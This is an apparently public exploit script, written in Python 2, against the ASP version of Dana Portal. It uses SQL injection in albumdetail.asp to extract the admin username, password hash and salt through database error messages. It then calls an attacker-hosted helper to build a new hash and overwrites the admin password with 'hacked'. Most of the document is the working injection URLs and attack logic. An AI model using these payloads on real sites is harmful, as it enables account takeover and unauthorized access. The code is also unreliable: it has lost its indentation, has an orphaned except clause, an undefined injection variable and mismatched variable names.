# Abysssec Inc Public Exploit Code
# Title : Dana Portal Remote Change Admin Password Exploit
# Affected Version : ASP Version
# Vulnerable File : albumdetail.asp
# Vendor Site : www.dana.ir
# note : no point to keep it private anymore .
# This exploit ueses of sql injection vulnerability exist in DANA Portal asp version
# the "real" problem is when you extract SHA1 hash , hash is not clear and is SHA1+Salt
# The alghorithm is not really hard to break and writing cracker tool but i prefered
# To update admin password (SH1 + Salt ) with "hacked" word .
# this exploit is just for educational purpose and author will be not be responsible for any damage using this exploit .
# feel free to contact me at : admin [at] abysssec.com
# for working with this exploit you need two asp file for updating hash you can download both from :
# www.abysssec.com/files/dana.zip
# www.milw0rm.com/sploits/2009-dana.zip
# then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code
import string
import urllib
import sys
import re
def Abysssec():
print "\n"
print "#####################################################"
print "# DanaPortal Remote Change Password Exploit #"
print "# www.Abysssec.com #"
print "#####################################################"
print "\n"
#Call Banner
print "\n[+] Target Host: e.g: http://site.com/danaportal/"
host=raw_input("\nTarget Host : ")
except KeyboardInterrupt:
print "\n[-] Program Terminated"
print "\n[+] Trying To Connect ...\n"
# Check Http in string
if host[:7] == "http://":
host = "http://"+host
#SQL Injection URL
response = urllib.urlopen(sql_inject).read()
print "[+] Trying To Inject Code ...\n"
#Extract Admin User
findall_users=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
#check found user length
if len(found_ussers)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
print "\n[+] Admin User : ",found_users[0]
# Extract Admin Hash
hash_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+password+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(hash_inject).read()
findall_hashs=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
if len(found_hashs)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
print "\n[+] Admin Hash : ",found_hashs[0]
# Extract Admin Salt
salt_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+salt+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(salt_inject).read()
findall_salt=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
if len(found_salt)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
print "\n[+] Admin Salt : ",found_salt[0]
# Extract User Code
usercode_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+user_code+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(usercode_inject).read()
findall_usercode=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
if len(found_usercode)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
print "\n[+] Admin Code : ",found_usercode[0]
# Generate New Hash + Salt
update_password = "http://wwww.yourasphost.com/salt.asp?salt="+found_salt[0] # change this url with yours !
response = urllib.urlopen(update_password).read()
updated_hash = ''.join(found_update)
# Update Password
usercode_inject = host+"/albumdetail.asp?Gid=-1+UPDATE+tblauthor+SET+password='"+updated_hash+"'+where+username='"+found_users[0]+"'--"
response = urllib.urlopen(usercode_inject).read()
if len(response) == 0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
print "[+] Updated Successfully \n"
print "[+] Login Url : "+host+"/manage"
print "[+] Username : "+found_users[0]
print "[+] Password : hacked"